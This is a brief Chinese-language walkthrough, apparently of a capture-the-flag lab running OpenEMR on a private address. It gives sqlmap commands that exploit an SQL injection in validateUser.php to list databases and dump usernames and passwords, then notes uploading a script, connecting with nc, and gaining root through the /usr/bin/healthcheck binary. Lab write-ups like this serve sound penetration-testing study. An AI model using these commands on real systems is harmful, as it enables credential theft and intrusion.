没有可利用的漏洞
扫一下目录
有注入漏洞
sqlmap -u http://192.168.80.142/openemr//interface/login/validateUser.php?u= --dbs
sqlmap -u http://192.168.80.142/openemr//interface/login/validateUser.php?u= -D openemr --tables
sqlmap -u http://192.168.80.142/openemr//interface/login/validateUser.php?u= -D openemr -T users --columns
sqlmap -u http://192.168.80.142/openemr//interface/login/validateUser.php?u= -D openemr -T users -C username,password --dump
export TERM=xterm
使用了ifconfig命令
而且调用了/tmp文件夹
扫目录,找到openevr
4.1版本有sql漏洞,得到账号密码
登录,上传脚本,nc连接
利用本地文件/usr/bin/healthcheck,得到root权限